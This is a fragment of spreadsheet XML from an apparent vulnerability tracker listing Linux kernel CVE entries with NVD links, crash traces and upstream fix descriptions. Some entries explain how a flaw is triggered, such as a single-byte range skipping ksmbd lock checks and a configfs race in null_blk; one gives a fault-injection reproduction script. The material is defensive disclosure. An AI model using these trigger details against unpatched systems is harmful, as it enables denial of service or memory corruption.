[ 2030.242776]  dump_stack_lvl+0xa2/0xd0
[ 2030.242794]  print_address_description+0x77/0x200
[ 2030.242815]  ? ksmbd_alloc_user+0x278/0x680
[ 2030.242831]  print_report+0x58/0x70
[ 2030.242848]  kasan_report+0x117/0x150
[ 2030.242869]  ? ksmbd_alloc_user+0x278/0x680
[ 2030.242888]  kasan_check_range+0x3c7/0x3f0
[ 2030.242908]  ? ksmbd_alloc_user+0x278/0x680
[ 2030.242925]  __asan_memcpy+0x29/0x70
[ 2030.242942]  ksmbd_alloc_user+0x278/0x680
[ 2030.242960]  ksmbd_login_user+0xc3/0x120
[ 2030.242978]  ntlm_authenticate+0x5e6/0x1b00
[ 2030.243017]  ? __pfx_ntlm_authenticate+0x10/0x10
[ 2030.243035]  ? ksmbd_session_lookup+0x188/0x1d0
[ 2030.243054]  ? __pfx_ksmbd_session_lookup+0x10/0x10
[ 2030.243090]  ? __sanitizer_cov_trace_switch+0x7b/0x140
[ 2030.243108]  smb2_sess_setup+0x1e4a/0x27b0
[ 2030.243126]  ? copy_from_kernel_nofault+0x199/0x300
[ 2030.243156]  ? __pfx_smb2_sess_setup+0x10/0x10
[ 2030.243173]  ? get_smb2_cmd_val+0xe3/0x1c0
[ 2030.243208]  handle_ksmbd_work+0x954/0x1280
[ 2030.243230]  ? __pfx_handle_ksmbd_work+0x10/0x10
[ 2030.243249]  ? process_scheduled_works+0xa07/0x1490
[ 2030.243270]  ? process_scheduled_works+0xa07/0x1490
[ 2030.243291]  process_scheduled_works+0xa70/0x1490
[ 2030.243320]  ? __pfx_process_scheduled_works+0x10/0x10
[ 2030.243340]  ? do_raw_spin_lock+0x130/0x300
[ 2030.243358]  ? lock_is_held_type+0x7b/0x110
[ 2030.243388]  worker_thread+0x932/0xe20
[ 2030.243415]  kthread+0x38a/0x470
[ 2030.243431]  ? __pfx_worker_thread+0x10/0x10
[ 2030.243451]  ? __pfx_kthread+0x10/0x10
[ 2030.243467]  ret_from_fork+0x484/0x910
[ 2030.243485]  ? __pfx_ret_from_fork+0x10/0x10
[ 2030.243501]  ? __switch_to+0xc77/0x12c0
[ 2030.243523]  ? __pfx_kthread+0x10/0x10
[ 2030.243540]  ret_from_fork_asm+0x1a/0x30
[ 2030.243564]  &lt;/TASK&gt;
[ 2030.243570]
[ 2030.290164] Allocated by task 19279:
[ 2030.290911]  kasan_save_track+0x3e/0x80
[ 2030.292179]  __kasan_kmalloc+0x72/0x90
[ 2030.293217]  __kvmalloc_node_noprof+0x3ff/0x6b0
[ 2030.294467]  handle_generic_event+0x59b/0x750
[ 2030.295345]  genl_family_rcv_msg_doit+0x238/0x340
[ 2030.296553]  genl_rcv_msg+0x606/0x7b0
[ 2030.297129]  netlink_rcv_skb+0x22b/0x4a0
[ 2030.298500]  genl_rcv+0x2d/0x40
[ 2030.299273]  netlink_unicast+0x7ba/0x930
[ 2030.300019]  netlink_sendmsg+0x8c3/0xb00
[ 2030.301073]  __sock_sendmsg+0xec/0x140
[ 2030.301579]  __sys_sendto+0x357/0x470
[ 2030.302255]  __x64_sys_sendto+0xe3/0x100
[ 2030.303425]  do_syscall_64+0x135/0x460
[ 2030.304763]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 2030.305594]
[ 2030.305819] The buggy address belongs to the object at ffff888121bb6640
[ 2030.305819]  which belongs to the cache kmalloc-192 of size 192
[ 2030.309595] The buggy address 
---truncated---</t>
        </is>
      </c>
      <c r="T542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90174</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90175</t>
        </is>
      </c>
      <c r="D543" s="5" t="inlineStr"/>
      <c r="E543" s="5" t="inlineStr"/>
      <c r="F543" s="5" t="inlineStr"/>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q543" s="5" t="inlineStr"/>
      <c r="R543" s="5" t="inlineStr"/>
      <c r="S543" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: server: fix leak of ksmbd_ipc_login_request_ext() returned buffer
Free it unconditionally after ksmbd_alloc_user() calls.
kmemleak splat:
  unreferenced object 0xffff888103b83540 (size 192):
    comm "pool-0", pid 16970, jiffies 4377290937
    hex dump (first 32 bytes):
      00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    backtrace (crc 408ccc66):
      __kvmalloc_node_noprof+0x730/0x920
      handle_generic_event+0xec/0x1a0 [ksmbd]
      genl_family_rcv_msg_doit+0xe0/0x130
      genl_rcv_msg+0x181/0x290
      netlink_rcv_skb+0x4f/0x100
      genl_rcv+0x28/0x40
      netlink_unicast+0x1e6/0x2c0
      netlink_sendmsg+0x20a/0x450
      ____sys_sendmsg+0x2e8/0x310
      ___sys_sendmsg+0x78/0xc0
      __sys_sendmsg+0x63/0xc0
      do_syscall_64+0xa1/0x670
      entry_SYSCALL_64_after_hwframe+0x76/0x7e</t>
        </is>
      </c>
      <c r="T543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90175</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90176</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2026-09-17</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q544" s="5" t="inlineStr"/>
      <c r="R544" s="5" t="inlineStr"/>
      <c r="S544" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: Do not skip lock checks for single-byte ranges
check_lock_range() uses inclusive ranges. Its callers pass the end
offset as start + length - 1, so start == end represents a valid
single-byte range rather than an empty range.
The start == end shortcut therefore skips mandatory byte-range lock
checks for one-byte reads, writes, copychunk operations and one-byte
truncate ranges. A conflicting lock covering that byte is not checked
and the operation is allowed to proceed.
Remove the shortcut. The truncate size == inode-&gt;i_size case is already
handled by only calling check_lock_range() when the new size differs
from the current file size.</t>
        </is>
      </c>
      <c r="T544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90176</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90177</t>
        </is>
      </c>
      <c r="D545" s="5" t="inlineStr"/>
      <c r="E545" s="5" t="inlineStr"/>
      <c r="F545" s="5" t="inlineStr"/>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q545" s="5" t="inlineStr"/>
      <c r="R545" s="5" t="inlineStr"/>
      <c r="S545" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Check pointer type for all atomic RMW paths
Atomic RMW verification records an instruction pointer type only when the
current destination is PTR_TO_ARENA. A second path can therefore reach the
same instruction with an ordinary pointer without comparing it against the
saved arena type.
The post-verification fixup uses the saved type to rewrite the instruction
to BPF_PROBE_ATOMIC for every path. Record the actual destination type for
all atomic RMW paths so the existing mismatch check rejects incompatible
uses of one instruction.</t>
        </is>
      </c>
      <c r="T545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90177</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90178</t>
        </is>
      </c>
      <c r="D546" s="5" t="inlineStr"/>
      <c r="E546" s="5" t="inlineStr"/>
      <c r="F546" s="5" t="inlineStr"/>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q546" s="5" t="inlineStr"/>
      <c r="R546" s="5" t="inlineStr"/>
      <c r="S546" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (coretemp) Fix core_data leak on CPUs without PTS
pdata-&gt;core_data is allocated in init_temp_data() when the first core
temp_data of a package is created, but it is only released from
destroy_temp_data(), and only in the branch that handles the package
temp_data.
Package temp_data is created solely when the CPU supports
X86_FEATURE_PTS. On a CPU without it, coretemp_cpu_online() never calls
coretemp_add_core() with pkg_flag set, so pdata-&gt;pkg_data stays NULL.
coretemp_cpu_offline() then skips the removal of the package interface,
destroy_temp_data() is never called for package data, and the array is
still allocated when coretemp_device_remove() frees the platform data
that pointed at it.
Release the array in coretemp_device_remove(). destroy_temp_data() sets
pdata-&gt;core_data to NULL when it frees it, so the added kfree() is a
no-op on CPUs that do have PTS.
Tested on an Intel Core i5-1135G7. The driver was instrumented to log
every allocation and release of pdata-&gt;core_data, and the PTS check in
coretemp_cpu_online() was patched out to emulate a CPU without package
thermal support. Without this change the array was allocated and never
released, and coretemp_device_remove() still saw a non-NULL pointer.
With it the array is released and the pointer accounting balances. On an
unmodified build the release still happens via the package temp_data and
the added kfree() sees NULL, with no slab warnings over repeated module
load and unload cycles.</t>
        </is>
      </c>
      <c r="T546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90178</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90179</t>
        </is>
      </c>
      <c r="D547" s="5" t="inlineStr"/>
      <c r="E547" s="5" t="inlineStr"/>
      <c r="F547" s="5" t="inlineStr"/>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q547" s="5" t="inlineStr"/>
      <c r="R547" s="5" t="inlineStr"/>
      <c r="S547" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix deadlock in complain-mode change_hat
The use of change_hat when in complain mode can cause a deadlock
when the hat doesn't exist and a new learning profile is created
for the missing profile. This is because change_hat() has taken
the lock to search the hat list and creating the new learning
profile needs to take the lock to add it to the list.
From the bug report:
Originally found in 7.0.0 in LTS ubuntu 26.04 with pam_apparmor + su
in complain mode set to change hats.  Then verified in newest
available vanilla kernel I've compiled to see if still present:
7.2-rc7 vanilla -&gt; affected
checked also some other kernels:
6.18.44 vanilla -&gt; affected
6.12.95 with debian patches -&gt; unaffected
On systems without bug (for example 6.12.95 debian) it just prints:
aa_change_hat rc=0
On systems with bug, the executable always hangs, prints nothing and
becomes unkillable.  (And once stuck this way, it will cause any
further hat changes to also cause the changing process to get stuck)
Then in syslog you can find hint about cause:
kernel: INFO: task hat:3409 blocked for more than 483 seconds.
kernel:       Not tainted 7.2.0-rc7 #1
kernel: "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
kernel: task:hat             state:D stack:0     pid:3409  tgid:3409  ppid:2605   task_flags:0x400000 flags:0x00080800
kernel: Call Trace:
kernel:  &lt;TASK&gt;
kernel:  __schedule+0x48f/0xfe0
kernel:  schedule+0x27/0xa0
kernel:  schedule_preempt_disabled+0x15/0x30
kernel:  __mutex_lock.constprop.0+0x569/0xa10
kernel:  aa_new_learning_profile+0x15f/0x210
kernel:  build_change_hat+0x19f/0x3b0
kernel:  change_hat.isra.0+0x5dd/0xd60
kernel:  aa_change_hat+0x2f3/0x710
kernel:  aa_setprocattr_changehat+0x121/0x1f0
kernel:  do_setattr+0x28c/0x340
kernel:  apparmor_setselfattr+0x20/0x50
kernel:  security_setselfattr+0xf6/0x110
kernel:  __x64_sys_lsm_set_self_attr+0x53/0x90
kernel:  do_syscall_64+0xdd/0x5e0
kernel:  ? __mod_memcg_lruvec_state+0xfd/0x260
kernel:  ? lruvec_stat_mod_folio+0x8d/0xd0
kernel:  ? __folio_mod_stat+0x2d/0x90
kernel:  ? map_anon_folio_pte_nopf+0xd1/0x1f0
kernel:  ? do_anonymous_page+0x184/0xa10
kernel:  ? __handle_mm_fault+0x805/0x870
kernel:  ? count_memcg_events+0xef/0x230
kernel:  ? handle_mm_fault+0x1f0/0x2f0
kernel:  ? do_user_addr_fault+0x2bb/0x7b0
kernel:  ? do_syscall_64+0x94/0x5e0
kernel:  ? exc_page_fault+0x75/0x160
kernel:  entry_SYSCALL_64_after_hwframe+0x76/0x7e
kernel: RIP: 0033:0x7f815e134c8d
kernel: RSP: 002b:00007fff6df94ea8 EFLAGS: 00000246 ORIG_RAX: 00000000000001cc
kernel: RAX: ffffffffffffffda RBX: 0000556d8c81d040 RCX: 00007f815e134c8d
kernel: RDX: 0000000000000046 RSI: 0000556d8c81d040 RDI: 0000000000000064
kernel: RBP: 00007fff6df94ef0 R08: 00007f815e212ac8 R09: 000000000000000c
kernel: R10: 0000000000000000 R11: 0000000000000246 R12: 0000556d8c81d010
kernel: R13: 0000000000000026 R14: 0000000000000046 R15: 0000000000000064
kernel:  &lt;/TASK&gt;
kernel: INFO: task hat:3409 is blocked on a mutex likely owned by task hat:3409.
To fix the issue, lift the locking out of the core of
aa_new_learning_profile(), introduce a wrapper function that takes the
lock where needed, and have build_change_hat() call the core function
that no longer takes the lock.
In addition fix 4 other issues introduced by commit
32e92764d6f8d ("apparmor: grab ns lock and refresh when looking up changehat child profiles")
- aa_get_profile_rcu() was replaced-by: aa_get_profile without the
  accompanying rcu_dereference_protected()
- an extra aa_get_label(label) was introduced at the start of
  change_hat() without an accompanying aa_put_label() causing a
  reference count leak.
- a reference count leak was introduced in the label_is_stale(label)
  case, where the newest profile would be leaked instead of the
  label passed to the function.
- a potential UAF when the lookup walks up the tree with new_ns != ns
  the new label refere
---truncated---</t>
        </is>
      </c>
      <c r="T547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90179</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90180</t>
        </is>
      </c>
      <c r="D548" s="5" t="inlineStr"/>
      <c r="E548" s="5" t="inlineStr"/>
      <c r="F548" s="5" t="inlineStr"/>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q548" s="5" t="inlineStr"/>
      <c r="R548" s="5" t="inlineStr"/>
      <c r="S548" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
block: mtip32xx: synchronize ioctls with device removal
The ioctl handlers only test REMOVE_PENDING before entering
mtip_hw_ioctl(). Removal can set that bit immediately afterwards and free
dd-&gt;port in mtip_hw_exit() while an ioctl still dereferences it. An already
open block device can reach the handlers while del_gendisk() is in
progress.
Serialize both native and compat ioctls with removal. Set REMOVE_PENDING
before taking the mutex so new callers fail after an in-flight ioctl has
drained, and hold the mutex until the port has been torn down.</t>
        </is>
      </c>
      <c r="T548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90180</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90181</t>
        </is>
      </c>
      <c r="D549" s="5" t="inlineStr"/>
      <c r="E549" s="5" t="inlineStr"/>
      <c r="F549" s="5" t="inlineStr"/>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q549" s="5" t="inlineStr"/>
      <c r="R549" s="5" t="inlineStr"/>
      <c r="S549" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ublk: avoid teardown retry loop on xarray allocation failure
__ublk_shmem_remove_ranges() removes matching maple tree ranges in
batches, but first stores each range into a temporary xarray so that the
pages can be unpinned after dropping the maple tree lock.
That temporary xarray is filled under the maple tree lock with
xa_store(..., GFP_ATOMIC). If the store fails before mas_erase(), the
current range is left in the tree and the helper returns false. The
outer ublk_shmem_remove_ranges() loop then immediately retries the same
range. While the atomic allocation keeps failing, the teardown path has
no forward progress.
The issue can be reproduced with radix_tree_node failslab injection after
a SHMEM_ZC buffer has already been registered:
  # Kernel config:
  #   CONFIG_BLK_DEV_UBLK=y
  #   CONFIG_DEBUG_FS=y
  #   CONFIG_FAULT_INJECTION=y
  #   CONFIG_FAULT_INJECTION_DEBUG_FS=y
  #   CONFIG_FAILSLAB=y
  echo 10 &gt; /proc/sys/vm/nr_hugepages
  mkdir -p /tmp/htlb
  mount -t hugetlbfs none /tmp/htlb
  fallocate -l 4M /tmp/htlb/ublk_buf
  dev_id=$(kublk add -t null --shmem_zc \
		--htlb /tmp/htlb/ublk_buf |
	   awk -F '[ :]' '/dev id/ {print $3}')
  echo 1 &gt; /sys/kernel/slab/radix_tree_node/failslab
  echo Y &gt; /sys/kernel/debug/failslab/cache-filter
  echo Y &gt; /sys/kernel/debug/failslab/ignore-gfp-wait
  echo 1 &gt; /sys/kernel/debug/failslab/interval
  echo -1 &gt; /sys/kernel/debug/failslab/times
  echo 100 &gt; /sys/kernel/debug/failslab/probability
  kublk del -n "$dev_id"
On the unfixed kernel the delete command was still running after 3
seconds. Disabling failslab made it return. The fault-injection stack
showed:
  should_failslab
  kmem_cache_alloc_lru_noprof
  __xas_nomem
  __xa_store
  xa_store
  __ublk_shmem_remove_ranges
  ublk_cdev_rel
  ublk_ctrl_del_dev
Remove the allocation from the teardown loop. Keep the existing batch
limit, but collect {base_pfn, nr_pages} pairs in a fixed-size stack array.
Once a matching range is found, the range is erased from the maple tree
before dropping the lock, so each successful scan makes progress without
depending on any GFP_ATOMIC allocation.
With the same failslab settings, the fixed kernel completed
"kublk del -n $dev_id" successfully in about 45 ms.</t>
        </is>
      </c>
      <c r="T549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90181</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90182</t>
        </is>
      </c>
      <c r="D550" s="5" t="inlineStr"/>
      <c r="E550" s="5" t="inlineStr"/>
      <c r="F550" s="5" t="inlineStr"/>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q550" s="5" t="inlineStr"/>
      <c r="R550" s="5" t="inlineStr"/>
      <c r="S550" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
blk-iocost: clear delay state when freeing policy data
iocg_kick_delay() turns sufficiently large debt into an explicit
block-cgroup delay with blkcg_set_delay(), setting blkg-&gt;use_delay to
-1 and incrementing blkcg-&gt;congestion_count.  Clearing it again depends
on iocg_kick_delay() running from the period timer, the waitq timer or
the issue path.
ioc_pd_free() removes the iocg from active_iocgs and cancels its waitq
timer, and no further bios can arrive, so once it has run nothing is
left which can reduce the debt and clear the delay.  The blkcg stays
marked congested for the rest of its life.
blk_cgroup_congested() then returns true for every task in that cgroup
and its descendants: page_cache_sync_ra() cuts readahead to a single
page, page_cache_async_ra() skips it altogether, and
__folio_throttle_swaprate() takes swap_avail_lock and schedules a
throttle on anonymous folio allocation.
Clear it explicitly, after the list removal and the synchronous
hrtimer_cancel() so that neither timer processing nor an I/O path can
re-arm it.  The free callback can also see policy data which was never
attached to a blkg, hence the pd-&gt;blkg check.</t>
        </is>
      </c>
      <c r="T550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90182</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90183</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2026-09-17</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr"/>
      <c r="S551" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
blk-iolatency: clear delay state when freeing policy data
io.latency can throttle a group which has no latency target of its own.
When a sibling misses its target, check_scale_change() scales down its
peers, and a peer that reaches queue depth one gets blkcg_use_delay()
called on it on every further scale-down, even with min_lat_nsec == 0.
iolatency_pd_offline() resets the target through
iolatency_set_min_lat_nsec(), which clears the delay only on a nonzero
to zero transition, so it never clears such a peer.  Freeing the policy
data then leaves blkg-&gt;use_delay set and blkcg-&gt;congestion_count
elevated with nothing left that can drop it.
blk_cgroup_congested() then returns true for every task in that cgroup
and its descendants for as long as the cgroup lives: page_cache_sync_ra()
cuts readahead to a single page, page_cache_async_ra() skips it
altogether, and __folio_throttle_swaprate() takes swap_avail_lock and
schedules a throttle on anonymous folio allocation.
Clear the delay in iolatency_pd_free().  By then bio-held blkg
references have drained, or the queue is frozen for policy
deactivation, so check_scale_change() cannot re-arm it.  The free
callback can also see policy data which was never attached to a blkg,
hence the pd-&gt;blkg check.</t>
        </is>
      </c>
      <c r="T551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90183</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90184</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2026-09-17</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr"/>
      <c r="S552" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: serialize configfs attribute updates with device setup
The attribute store methods generated with NULLB_DEVICE_ATTR() refuse to
change the configuration of a live device by testing
NULLB_DEV_FL_CONFIGURED, but that flag is only set by
nullb_device_power_store() after null_add_dev() has returned, and the
store methods take no lock at all. configfs only serializes writes to
the same open file (buffer-&gt;mutex), so a write to any attribute can run
concurrently with null_add_dev() and change the device configuration
while it is being used.
null_add_dev() reads the configuration several times, e.g. dev-&gt;zoned is
read once to set up the queue limits and once to initialize the zone
resources:
  CPU0: echo 1 &gt; nullb0/power         CPU1: echo 1 &gt; nullb0/zoned
  nullb_device_power_store()
    mutex_lock(&amp;lock)
    null_add_dev()
      if (dev-&gt;zoned) -&gt; false
        /* no BLK_FEAT_ZONED */       nullb_device_zoned_store()
                                        test_bit(FL_CONFIGURED) -&gt; 0
                                        dev-&gt;zoned = true
      blk_mq_alloc_disk()
        /* queue is not zoned */
      if (nullb-&gt;dev-&gt;zoned) -&gt; true
        null_register_zoned_dev()
          blk_revalidate_disk_zones()
blk_revalidate_disk_zones() is then called for a queue that does not
have BLK_FEAT_ZONED set, which triggers its WARN_ON_ONCE() and fails the
device setup with -EIO:
  WARNING: CPU: 2 PID: 322 at block/blk-zoned.c:2357 blk_revalidate_disk_zones+0x4c/0x560
Clearing dev-&gt;zoned in the same window is worse: the queue is created
with BLK_FEAT_ZONED but the zone resources are never initialized, so
add_disk() succeeds for a zoned disk that has no zones. And a store that
lands after the last dev-&gt;zoned test leaves dev-&gt;zoned set while
dev-&gt;zones is still NULL, which null_process_zoned_cmd() dereferences on
the first write.
Fix this by taking the global lock, which nullb_device_power_store()
already holds across null_add_dev() and null_del_dev(), around both the
NULLB_DEV_FL_CONFIGURED test and the update of the device configuration.
The submit_queues and poll_queues apply callbacks are now called with
that lock held, so remove the locking they did themselves.
Since the store methods can run as soon as configfs_register_subsystem()
returns, that is, before null_init() gets to mutex_init(&amp;lock), also
initialize the lock statically with DEFINE_MUTEX().</t>
        </is>
      </c>
      <c r="T552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90184</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90185</t>
        </is>
      </c>
      <c r="D553" s="5" t="inlineStr"/>
      <c r="E553" s="5" t="inlineStr"/>
      <c r="F553" s="5" t="inlineStr"/>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr"/>
